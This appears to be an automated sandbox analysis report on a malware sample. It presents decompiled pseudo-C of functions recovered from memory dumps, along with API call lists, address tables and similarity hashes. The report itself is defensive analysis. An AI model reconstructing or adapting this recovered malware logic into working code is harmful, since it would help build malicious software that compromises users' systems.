                                                                                                                                                                                                                        				_push(__eax);
                                                                                                                                                                                                                        				while(1) {
                                                                                                                                                                                                                        					_t8 = StrChrA();
                                                                                                                                                                                                                        					if(_t8 == 0) {
                                                                                                                                                                                                                        						break;
                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                        					_t23 = _t23 + 1;
                                                                                                                                                                                                                        					_push(0x20);
                                                                                                                                                                                                                        					_push( &(_t8[1]));
                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                        				_t12 = E026F6D10(_t23 << 2);
                                                                                                                                                                                                                        				 *((intOrPtr*)(_t27 + 0x10)) = _t12;
                                                                                                                                                                                                                        				if(_t12 != 0) {
                                                                                                                                                                                                                        					StrTrimA(_t21, 0x26fc28c); // executed
                                                                                                                                                                                                                        					_t26 = 0;
                                                                                                                                                                                                                        					do {
                                                                                                                                                                                                                        						_t24 = StrChrA(_t21, 0x20);
                                                                                                                                                                                                                        						if(_t24 != 0) {
                                                                                                                                                                                                                        							 *_t24 = 0;
                                                                                                                                                                                                                        							_t24 =  &(_t24[1]);
                                                                                                                                                                                                                        							StrTrimA(_t24, 0x26fc28c);
                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                        						_t2 = _t27 + 0x10; // 0x4d283a53
                                                                                                                                                                                                                        						 *( *_t2 + _t26 * 4) = _t21;
                                                                                                                                                                                                                        						_t26 = _t26 + 1;
                                                                                                                                                                                                                        						_t21 = _t24;
                                                                                                                                                                                                                        					} while (_t24 != 0);
                                                                                                                                                                                                                        					_t6 = _t27 + 0x10; // 0x4d283a53
                                                                                                                                                                                                                        					 *((intOrPtr*)( *((intOrPtr*)(_t27 + 0x18)))) =  *_t6;
                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                        				return 0;
                                                                                                                                                                                                                        			}










                                                                                                                                                                                                                        0x026fa600
                                                                                                                                                                                                                        0x026fa604
                                                                                                                                                                                                                        0x026fa606
                                                                                                                                                                                                                        0x026fa607
                                                                                                                                                                                                                        0x026fa60f
                                                                                                                                                                                                                        0x026fa60f
                                                                                                                                                                                                                        0x026fa613
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x026fa60a
                                                                                                                                                                                                                        0x026fa60b
                                                                                                                                                                                                                        0x026fa60e
                                                                                                                                                                                                                        0x026fa60e
                                                                                                                                                                                                                        0x026fa61b
                                                                                                                                                                                                                        0x026fa620
                                                                                                                                                                                                                        0x026fa626
                                                                                                                                                                                                                        0x026fa62e
                                                                                                                                                                                                                        0x026fa634
                                                                                                                                                                                                                        0x026fa636
                                                                                                                                                                                                                        0x026fa63b
                                                                                                                                                                                                                        0x026fa63f
                                                                                                                                                                                                                        0x026fa641
                                                                                                                                                                                                                        0x026fa644
                                                                                                                                                                                                                        0x026fa64b
                                                                                                                                                                                                                        0x026fa64b
                                                                                                                                                                                                                        0x026fa651
                                                                                                                                                                                                                        0x026fa655
                                                                                                                                                                                                                        0x026fa658
                                                                                                                                                                                                                        0x026fa659
                                                                                                                                                                                                                        0x026fa65b
                                                                                                                                                                                                                        0x026fa663
                                                                                                                                                                                                                        0x026fa667
                                                                                                                                                                                                                        0x026fa667
                                                                                                                                                                                                                        0x026fa674

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • StrChrA.SHLWAPI(?,00000020,00000000,04B395AC,?,?,?,026F5027,04B395AC,?,?,?,026F2018,?,?,?), ref: 026FA60F
                                                                                                                                                                                                                        • StrTrimA.KERNELBASE(?,026FC28C,00000002,?,?,?,026F5027,04B395AC,?,?,?,026F2018,?,?,?,4D283A53), ref: 026FA62E
                                                                                                                                                                                                                        • StrChrA.SHLWAPI(?,00000020,?,?,?,026F5027,04B395AC,?,?,?,026F2018,?,?,?,4D283A53,?), ref: 026FA639
                                                                                                                                                                                                                        • StrTrimA.SHLWAPI(00000001,026FC28C,?,?,?,026F5027,04B395AC,?,?,?,026F2018,?,?,?,4D283A53,?), ref: 026FA64B
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000001.00000002.925371401.00000000026F1000.00000020.00000001.sdmp, Offset: 026F0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925367413.00000000026F0000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925384883.00000000026FC000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925389502.00000000026FD000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925395826.00000000026FF000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Trim
                                                                                                                                                                                                                        • String ID: S:(M
                                                                                                                                                                                                                        • API String ID: 3043112668-2217774225
                                                                                                                                                                                                                        • Opcode ID: 4efd83c6f5c6beabf535c6b2e5eda55b8315ae36bd90367348828f27718256c0
                                                                                                                                                                                                                        • Instruction ID: 8736b3ee21008176906594edf4f84f2a7ff896d11eab5e9180748587ec05e7e5
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4efd83c6f5c6beabf535c6b2e5eda55b8315ae36bd90367348828f27718256c0
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5D012831645311AFDB609EA98C48F2BBF98EB46A90F211519FA45C7340DB60CC1282B4
                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                        C-Code - Quality: 57%
                                                                                                                                                                                                                        			E026F1E95(signed int __edx) {
                                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                                        				long _v12;
                                                                                                                                                                                                                        				CHAR* _v16;
                                                                                                                                                                                                                        				long _v20;
                                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                                        				void* _t21;
                                                                                                                                                                                                                        				CHAR* _t22;
                                                                                                                                                                                                                        				CHAR* _t25;
                                                                                                                                                                                                                        				intOrPtr _t26;
                                                                                                                                                                                                                        				void* _t27;
                                                                                                                                                                                                                        				void* _t31;
                                                                                                                                                                                                                        				void* _t32;
                                                                                                                                                                                                                        				CHAR* _t36;
                                                                                                                                                                                                                        				CHAR* _t42;
                                                                                                                                                                                                                        				CHAR* _t43;
                                                                                                                                                                                                                        				CHAR* _t44;
                                                                                                                                                                                                                        				CHAR* _t46;
                                                                                                                                                                                                                        				void* _t49;
                                                                                                                                                                                                                        				void* _t51;
                                                                                                                                                                                                                        				signed char _t56;
                                                                                                                                                                                                                        				intOrPtr _t58;
                                                                                                                                                                                                                        				signed int _t59;
                                                                                                                                                                                                                        				void* _t63;
                                                                                                                                                                                                                        				CHAR* _t67;
                                                                                                                                                                                                                        				CHAR* _t68;
                                                                                                                                                                                                                        				char* _t69;
                                                                                                                                                                                                                        				void* _t70;
                                                                                                                                                                                                                        
                                                                                                                                                                                                                        				_t61 = __edx;
                                                                                                                                                                                                                        				_v20 = 0;
                                                                                                                                                                                                                        				_v8 = 0;
                                                                                                                                                                                                                        				_v12 = 0;
                                                                                                                                                                                                                        				_t21 = E026F4D5D();
                                                                                                                                                                                                                        				if(_t21 != 0) {
                                                                                                                                                                                                                        					_t59 =  *0x26fd25c; // 0x4000000a
                                                                                                                                                                                                                        					_t55 = (_t59 & 0xf0000000) + _t21;
                                                                                                                                                                                                                        					 *0x26fd25c = (_t59 & 0xf0000000) + _t21;
                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                        				_t22 =  *0x26fd164(0, 2);
                                                                                                                                                                                                                        				_v16 = _t22;
                                                                                                                                                                                                                        				if(_t22 == 0 || _t22 == 1 || _t22 == 0x80010106) {
                                                                                                                                                                                                                        					_t25 = E026F86DB( &_v8,  &_v20); // executed
                                                                                                                                                                                                                        					_t54 = _t25;
                                                                                                                                                                                                                        					_t26 =  *0x26fd2a4; // 0x243a5a8
                                                                                                                                                                                                                        					if( *0x26fd25c > 5) {
                                                                                                                                                                                                                        						_t8 = _t26 + 0x26fe5cd; // 0x4d283a53
                                                                                                                                                                                                                        						_t27 = _t8;
                                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                                        						_t7 = _t26 + 0x26fe9f3; // 0x44283a44
                                                                                                                                                                                                                        						_t27 = _t7;
                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                        					E026F5136(_t27, _t27);
                                                                                                                                                                                                                        					_t31 = E026F8492(_t61,  &_v20,  &_v12); // executed
                                                                                                                                                                                                                        					if(_t31 == 0) {
                                                                                                                                                                                                                        						CloseHandle(_v20);
                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                        					_t63 = 5;
                                                                                                                                                                                                                        					if(_t54 != _t63) {
                                                                                                                                                                                                                        						 *0x26fd270 =  *0x26fd270 ^ 0x81bbe65d;
                                                                                                                                                                                                                        						_t32 = E026F6D10(0x60);
                                                                                                                                                                                                                        						 *0x26fd324 = _t32;
                                                                                                                                                                                                                        						__eflags = _t32;
                                                                                                                                                                                                                        						if(_t32 == 0) {
                                                                                                                                                                                                                        							_push(8);
                                                                                                                                                                                                                        							_pop(0);
                                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                                        							memset(_t32, 0, 0x60);
                                                                                                                                                                                                                        							_t49 =  *0x26fd324; // 0x4b395b0
                                                                                                                                                                                                                        							_t70 = _t70 + 0xc;
                                                                                                                                                                                                                        							__imp__(_t49 + 0x40);
                                                                                                                                                                                                                        							_t51 =  *0x26fd324; // 0x4b395b0
                                                                                                                                                                                                                        							 *_t51 = 0x26fe845;
                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                        						_t54 = 0;
                                                                                                                                                                                                                        						__eflags = 0;
                                                                                                                                                                                                                        						if(0 == 0) {
                                                                                                                                                                                                                        							_t36 = RtlAllocateHeap( *0x26fd238, 0, 0x43);
                                                                                                                                                                                                                        							 *0x26fd2c4 = _t36;
                                                                                                                                                                                                                        							__eflags = _t36;
                                                                                                                                                                                                                        							if(_t36 == 0) {
                                                                                                                                                                                                                        								_push(8);
                                                                                                                                                                                                                        								_pop(0);
                                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                                        								_t56 =  *0x26fd25c; // 0x4000000a
                                                                                                                                                                                                                        								_t61 = _t56 & 0x000000ff;
                                                                                                                                                                                                                        								_t58 =  *0x26fd2a4; // 0x243a5a8
                                                                                                                                                                                                                        								_t13 = _t58 + 0x26fe55a; // 0x697a6f4d
                                                                                                                                                                                                                        								_t55 = _t13;
                                                                                                                                                                                                                        								wsprintfA(_t36, _t13, _t56 & 0x000000ff, _t56 & 0x000000ff, 0x26fc28f);
                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                        							_t54 = 0;
                                                                                                                                                                                                                        							__eflags = 0;
                                                                                                                                                                                                                        							if(0 == 0) {
                                                                                                                                                                                                                        								asm("sbb eax, eax");
                                                                                                                                                                                                                        								E026F65CE( ~_v8 &  *0x26fd270, 0x26fd00c); // executed
                                                                                                                                                                                                                        								_t42 = E026FA22C(0, _t55, _t63, 0x26fd00c); // executed
                                                                                                                                                                                                                        								_t54 = _t42;
                                                                                                                                                                                                                        								__eflags = _t54;
                                                                                                                                                                                                                        								if(_t54 != 0) {
                                                                                                                                                                                                                        									goto L30;
                                                                                                                                                                                                                        								}
                                                                                                                                                                                                                        								_t43 = E026F8557(_t55); // executed
                                                                                                                                                                                                                        								__eflags = _t43;
                                                                                                                                                                                                                        								if(_t43 != 0) {
                                                                                                                                                                                                                        									__eflags = _v8;
                                                                                                                                                                                                                        									_t67 = _v12;
                                                                                                                                                                                                                        									if(_v8 != 0) {
                                                                                                                                                                                                                        										L29:
                                                                                                                                                                                                                        										_t44 = E026F6130(_t61, _t67, _v8); // executed
                                                                                                                                                                                                                        										_t54 = _t44;
                                                                                                                                                                                                                        										goto L30;
                                                                                                                                                                                                                        									}
                                                                                                                                                                                                                        									__eflags = _t67;
                                                                                                                                                                                                                        									if(__eflags == 0) {
                                                                                                                                                                                                                        										goto L30;
                                                                                                                                                                                                                        									}
                                                                                                                                                                                                                        									_t46 = E026F6810(__eflags,  &(_t67[4])); // executed
                                                                                                                                                                                                                        									_t54 = _t46;
                                                                                                                                                                                                                        									__eflags = _t54;
                                                                                                                                                                                                                        									if(_t54 == 0) {
                                                                                                                                                                                                                        										goto L30;
                                                                                                                                                                                                                        									}
                                                                                                                                                                                                                        									goto L29;
                                                                                                                                                                                                                        								}
                                                                                                                                                                                                                        								_t54 = 8;
                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                                        						_t68 = _v12;
                                                                                                                                                                                                                        						if(_t68 == 0) {
                                                                                                                                                                                                                        							L30:
                                                                                                                                                                                                                        							if(_v16 == 0 || _v16 == 1) {
                                                                                                                                                                                                                        								 *0x26fd160();
                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                        							goto L34;
                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                        						_t69 =  &(_t68[4]);
                                                                                                                                                                                                                        						do {
                                                                                                                                                                                                                        						} while (E026F5C56(_t63, _t69, 0, 1) == 0x4c7);
                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                        					goto L30;
                                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                                        					_t54 = _t22;
                                                                                                                                                                                                                        					L34:
                                                                                                                                                                                                                        					return _t54;
                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                        			}
































                                                                                                                                                                                                                        0x026f1e95
                                                                                                                                                                                                                        0x026f1e9f
                                                                                                                                                                                                                        0x026f1ea2
                                                                                                                                                                                                                        0x026f1ea5
                                                                                                                                                                                                                        0x026f1ea8
                                                                                                                                                                                                                        0x026f1eaf
                                                                                                                                                                                                                        0x026f1eb1
                                                                                                                                                                                                                        0x026f1ebd
                                                                                                                                                                                                                        0x026f1ebf
                                                                                                                                                                                                                        0x026f1ebf
                                                                                                                                                                                                                        0x026f1ec8
                                                                                                                                                                                                                        0x026f1ece
                                                                                                                                                                                                                        0x026f1ed3
                                                                                                                                                                                                                        0x026f1eed
                                                                                                                                                                                                                        0x026f1ef9
                                                                                                                                                                                                                        0x026f1efb
                                                                                                                                                                                                                        0x026f1f00
                                                                                                                                                                                                                        0x026f1f0a
                                                                                                                                                                                                                        0x026f1f0a
                                                                                                                                                                                                                        0x026f1f02
                                                                                                                                                                                                                        0x026f1f02
                                                                                                                                                                                                                        0x026f1f02
                                                                                                                                                                                                                        0x026f1f02
                                                                                                                                                                                                                        0x026f1f11
                                                                                                                                                                                                                        0x026f1f1e
                                                                                                                                                                                                                        0x026f1f25
                                                                                                                                                                                                                        0x026f1f2a
                                                                                                                                                                                                                        0x026f1f2a
                                                                                                                                                                                                                        0x026f1f33
                                                                                                                                                                                                                        0x026f1f36
                                                                                                                                                                                                                        0x026f1f5c
                                                                                                                                                                                                                        0x026f1f68
                                                                                                                                                                                                                        0x026f1f6d
                                                                                                                                                                                                                        0x026f1f72
                                                                                                                                                                                                                        0x026f1f74
                                                                                                                                                                                                                        0x026f1fa0
                                                                                                                                                                                                                        0x026f1fa2
                                                                                                                                                                                                                        0x026f1f76
                                                                                                                                                                                                                        0x026f1f7a
                                                                                                                                                                                                                        0x026f1f7f
                                                                                                                                                                                                                        0x026f1f84
                                                                                                                                                                                                                        0x026f1f8b
                                                                                                                                                                                                                        0x026f1f91
                                                                                                                                                                                                                        0x026f1f96
                                                                                                                                                                                                                        0x026f1f9c
                                                                                                                                                                                                                        0x026f1fa3
                                                                                                                                                                                                                        0x026f1fa5
                                                                                                                                                                                                                        0x026f1fa7
                                                                                                                                                                                                                        0x026f1fb6
                                                                                                                                                                                                                        0x026f1fbc
                                                                                                                                                                                                                        0x026f1fc1
                                                                                                                                                                                                                        0x026f1fc3
                                                                                                                                                                                                                        0x026f1ff3
                                                                                                                                                                                                                        0x026f1ff5
                                                                                                                                                                                                                        0x026f1fc5
                                                                                                                                                                                                                        0x026f1fc5
                                                                                                                                                                                                                        0x026f1fcb
                                                                                                                                                                                                                        0x026f1fd8
                                                                                                                                                                                                                        0x026f1fde
                                                                                                                                                                                                                        0x026f1fde
                                                                                                                                                                                                                        0x026f1fe6
                                                                                                                                                                                                                        0x026f1fef
                                                                                                                                                                                                                        0x026f1ff6
                                                                                                                                                                                                                        0x026f1ff8
                                                                                                                                                                                                                        0x026f1ffa
                                                                                                                                                                                                                        0x026f2001
                                                                                                                                                                                                                        0x026f200e
                                                                                                                                                                                                                        0x026f2013
                                                                                                                                                                                                                        0x026f2018
                                                                                                                                                                                                                        0x026f201a
                                                                                                                                                                                                                        0x026f201c
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x026f201e
                                                                                                                                                                                                                        0x026f2023
                                                                                                                                                                                                                        0x026f2025
                                                                                                                                                                                                                        0x026f202c
                                                                                                                                                                                                                        0x026f2030
                                                                                                                                                                                                                        0x026f2033
                                                                                                                                                                                                                        0x026f2048
                                                                                                                                                                                                                        0x026f204c
                                                                                                                                                                                                                        0x026f2051
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x026f2051
                                                                                                                                                                                                                        0x026f2035
                                                                                                                                                                                                                        0x026f2037
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x026f203d
                                                                                                                                                                                                                        0x026f2042
                                                                                                                                                                                                                        0x026f2044
                                                                                                                                                                                                                        0x026f2046
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x026f2046
                                                                                                                                                                                                                        0x026f2029
                                                                                                                                                                                                                        0x026f2029
                                                                                                                                                                                                                        0x026f1ffa
                                                                                                                                                                                                                        0x026f1f38
                                                                                                                                                                                                                        0x026f1f38
                                                                                                                                                                                                                        0x026f1f3d
                                                                                                                                                                                                                        0x026f2053
                                                                                                                                                                                                                        0x026f2058
                                                                                                                                                                                                                        0x026f2060
                                                                                                                                                                                                                        0x026f2060
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x026f2058
                                                                                                                                                                                                                        0x026f1f43
                                                                                                                                                                                                                        0x026f1f46
                                                                                                                                                                                                                        0x026f1f50
                                                                                                                                                                                                                        0x026f1f57
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x026f2068
                                                                                                                                                                                                                        0x026f2068
                                                                                                                                                                                                                        0x026f206b
                                                                                                                                                                                                                        0x026f206f
                                                                                                                                                                                                                        0x026f206f

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                          • Part of subcall function 026F4D5D: GetModuleHandleA.KERNEL32(4C44544E,00000000,026F1EAD,00000001), ref: 026F4D6C
                                                                                                                                                                                                                        • CloseHandle.KERNEL32(?,?,?,4D283A53,?,?), ref: 026F1F2A
                                                                                                                                                                                                                          • Part of subcall function 026F6D10: RtlAllocateHeap.NTDLL(00000000,-00000008,026F5D29), ref: 026F6D1C
                                                                                                                                                                                                                        • memset.NTDLL ref: 026F1F7A
                                                                                                                                                                                                                        • RtlInitializeCriticalSection.NTDLL(04B39570), ref: 026F1F8B
                                                                                                                                                                                                                          • Part of subcall function 026F6810: memset.NTDLL ref: 026F682A
                                                                                                                                                                                                                          • Part of subcall function 026F6810: lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 026F6861
                                                                                                                                                                                                                          • Part of subcall function 026F6810: StrCmpNIW.KERNELBASE(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,026F2042), ref: 026F686C
                                                                                                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,00000043,00000060), ref: 026F1FB6
                                                                                                                                                                                                                        • wsprintfA.USER32 ref: 026F1FE6
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000001.00000002.925371401.00000000026F1000.00000020.00000001.sdmp, Offset: 026F0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925367413.00000000026F0000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925384883.00000000026FC000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925389502.00000000026FD000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925395826.00000000026FF000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: AllocateHandleHeapmemset$CloseCriticalInitializeModuleSectionlstrlenwsprintf
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 4246211962-0
                                                                                                                                                                                                                        • Opcode ID: d304ac6310787b3ebb6e1d4232f3c9c55126da40b4879a826e4f88f508e37545
                                                                                                                                                                                                                        • Instruction ID: bee74b77c01b40fe055786c52cd7d44de5e9d5759822e5ce7108a1558f4d8e48
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d304ac6310787b3ebb6e1d4232f3c9c55126da40b4879a826e4f88f508e37545
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FB513672E41214EBDFE0EBA8DC85B6E37E8AB09704F00485AE705D7244E775A591CF94
                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                        C-Code - Quality: 90%
                                                                                                                                                                                                                        			E026F6810(void* __eflags, WCHAR* _a4) {
                                                                                                                                                                                                                        				char _v40;
                                                                                                                                                                                                                        				char _v44;
                                                                                                                                                                                                                        				void _v48;
                                                                                                                                                                                                                        				int _v52;
                                                                                                                                                                                                                        				char _v56;
                                                                                                                                                                                                                        				char _v60;
                                                                                                                                                                                                                        				void* _v64;
                                                                                                                                                                                                                        				char _v68;
                                                                                                                                                                                                                        				intOrPtr _v72;
                                                                                                                                                                                                                        				int _v76;
                                                                                                                                                                                                                        				WCHAR* _v84;
                                                                                                                                                                                                                        				intOrPtr _v88;
                                                                                                                                                                                                                        				intOrPtr _v92;
                                                                                                                                                                                                                        				char _v96;
                                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                                        				intOrPtr _t40;
                                                                                                                                                                                                                        				int _t45;
                                                                                                                                                                                                                        				char _t50;
                                                                                                                                                                                                                        				intOrPtr _t52;
                                                                                                                                                                                                                        				void* _t55;
                                                                                                                                                                                                                        				intOrPtr _t67;
                                                                                                                                                                                                                        				void* _t70;
                                                                                                                                                                                                                        				void* _t81;
                                                                                                                                                                                                                        				WCHAR* _t90;
                                                                                                                                                                                                                        
                                                                                                                                                                                                                        				_v52 = 0;
                                                                                                                                                                                                                        				memset( &_v48, 0, 0x2c);
                                                                                                                                                                                                                        				_v76 = 0;
                                                                                                                                                                                                                        				asm("stosd");
                                                                                                                                                                                                                        				asm("stosd");
                                                                                                                                                                                                                        				asm("stosd");
                                                                                                                                                                                                                        				asm("stosd");
                                                                                                                                                                                                                        				asm("stosd");
                                                                                                                                                                                                                        				_t40 =  *0x26fd2a4; // 0x243a5a8
                                                                                                                                                                                                                        				_t5 = _t40 + 0x26fee14; // 0x410025
                                                                                                                                                                                                                        				_t90 = E026F90A5(_t5);
                                                                                                                                                                                                                        				_v84 = _t90;
                                                                                                                                                                                                                        				if(_t90 == 0) {
                                                                                                                                                                                                                        					_t81 = 8;
                                                                                                                                                                                                                        					L24:
                                                                                                                                                                                                                        					return _t81;
                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                        				_t45 = StrCmpNIW(_t90, _a4, lstrlenW(_t90)); // executed
                                                                                                                                                                                                                        				if(_t45 != 0) {
                                                                                                                                                                                                                        					_t81 = 1;
                                                                                                                                                                                                                        					L22:
                                                                                                                                                                                                                        					E026F45B3(_v88);
                                                                                                                                                                                                                        					goto L24;
                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                        				if(E026F3A8E(0,  &_v96) != 0) {
                                                                                                                                                                                                                        					_v96 = 0;
                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                        				_t50 = E026FA5A3(0,  *0x26fd33c);
                                                                                                                                                                                                                        				_v96 = _t50;
                                                                                                                                                                                                                        				if(_t50 == 0) {
                                                                                                                                                                                                                        					_t81 = 8;
                                                                                                                                                                                                                        					goto L19;
                                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                                        					_t52 =  *0x26fd2a4; // 0x243a5a8
                                                                                                                                                                                                                        					_t11 = _t52 + 0x26fe81a; // 0x65696c43
                                                                                                                                                                                                                        					_t55 = E026FA5A3(0, _t11);
                                                                                                                                                                                                                        					_t93 = _t55;
                                                                                                                                                                                                                        					if(_t55 == 0) {
                                                                                                                                                                                                                        						_t81 = 8;
                                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                                        						_t81 = E026F424B(_v96, 0x80000001, _v92, _t93,  &_v60,  &_v56);
                                                                                                                                                                                                                        						E026F45B3(_t93);
                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                        					if(_t81 != 0) {
                                                                                                                                                                                                                        						L17:
                                                                                                                                                                                                                        						E026F45B3(_v92);
                                                                                                                                                                                                                        						L19:
                                                                                                                                                                                                                        						_t92 = _v96;
                                                                                                                                                                                                                        						if(_v96 != 0) {
                                                                                                                                                                                                                        							E026F3B83(_t92);
                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                        						goto L22;
                                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                                        						if(( *0x26fd260 & 0x00000001) == 0) {
                                                                                                                                                                                                                        							L14:
                                                                                                                                                                                                                        							E026F3712(_t81, _v60, _v56,  *0x26fd270, 0);
                                                                                                                                                                                                                        							_t81 = E026F582F(_v72,  &_v64,  &_v60, 0);
                                                                                                                                                                                                                        							if(_t81 == 0) {
                                                                                                                                                                                                                        								_v68 = _v96;
                                                                                                                                                                                                                        								_v64 =  &_v60;
                                                                                                                                                                                                                        								_t81 = E026F8F5F( &_v84, 0);
                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                        							E026F45B3(_v60);
                                                                                                                                                                                                                        							goto L17;
                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                        						_t67 =  *0x26fd2a4; // 0x243a5a8
                                                                                                                                                                                                                        						_t18 = _t67 + 0x26fe823; // 0x65696c43
                                                                                                                                                                                                                        						_t70 = E026FA5A3(0, _t18);
                                                                                                                                                                                                                        						_t95 = _t70;
                                                                                                                                                                                                                        						if(_t70 == 0) {
                                                                                                                                                                                                                        							_t81 = 8;
                                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                                        							_t22 =  &_v96; // 0x65696c43
                                                                                                                                                                                                                        							_t81 = E026F424B( *_t22, 0x80000001, _v92, _t95,  &_v44,  &_v40);
                                                                                                                                                                                                                        							E026F45B3(_t95);
                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                        						if(_t81 != 0) {
                                                                                                                                                                                                                        							goto L17;
                                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                                        							goto L14;
                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                        			}




























                                                                                                                                                                                                                        0x026f6826
                                                                                                                                                                                                                        0x026f682a
                                                                                                                                                                                                                        0x026f6831
                                                                                                                                                                                                                        0x026f6839
                                                                                                                                                                                                                        0x026f683a
                                                                                                                                                                                                                        0x026f683b
                                                                                                                                                                                                                        0x026f683c
                                                                                                                                                                                                                        0x026f683d
                                                                                                                                                                                                                        0x026f683e
                                                                                                                                                                                                                        0x026f6846
                                                                                                                                                                                                                        0x026f6852
                                                                                                                                                                                                                        0x026f6854
                                                                                                                                                                                                                        0x026f685a
                                                                                                                                                                                                                        0x026f69c3
                                                                                                                                                                                                                        0x026f69c4
                                                                                                                                                                                                                        0x026f69cc
                                                                                                                                                                                                                        0x026f69cc
                                                                                                                                                                                                                        0x026f686c
                                                                                                                                                                                                                        0x026f6874
                                                                                                                                                                                                                        0x026f69b5
                                                                                                                                                                                                                        0x026f69b6
                                                                                                                                                                                                                        0x026f69ba
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x026f69ba
                                                                                                                                                                                                                        0x026f6887
                                                                                                                                                                                                                        0x026f6889
                                                                                                                                                                                                                        0x026f6889
                                                                                                                                                                                                                        0x026f6895
                                                                                                                                                                                                                        0x026f689a
                                                                                                                                                                                                                        0x026f68a0
                                                                                                                                                                                                                        0x026f69a3
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x026f68a6
                                                                                                                                                                                                                        0x026f68a6
                                                                                                                                                                                                                        0x026f68ab
                                                                                                                                                                                                                        0x026f68b4
                                                                                                                                                                                                                        0x026f68b9
                                                                                                                                                                                                                        0x026f68c2
                                                                                                                                                                                                                        0x026f68e9
                                                                                                                                                                                                                        0x026f68c4
                                                                                                                                                                                                                        0x026f68de
                                                                                                                                                                                                                        0x026f68e0
                                                                                                                                                                                                                        0x026f68e0
                                                                                                                                                                                                                        0x026f68ec
                                                                                                                                                                                                                        0x026f6996
                                                                                                                                                                                                                        0x026f699a
                                                                                                                                                                                                                        0x026f69a4
                                                                                                                                                                                                                        0x026f69a4
                                                                                                                                                                                                                        0x026f69aa
                                                                                                                                                                                                                        0x026f69ac
                                                                                                                                                                                                                        0x026f69ac
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x026f68f2
                                                                                                                                                                                                                        0x026f68f9
                                                                                                                                                                                                                        0x026f693e
                                                                                                                                                                                                                        0x026f6951
                                                                                                                                                                                                                        0x026f696a
                                                                                                                                                                                                                        0x026f696e
                                                                                                                                                                                                                        0x026f6974
                                                                                                                                                                                                                        0x026f697c
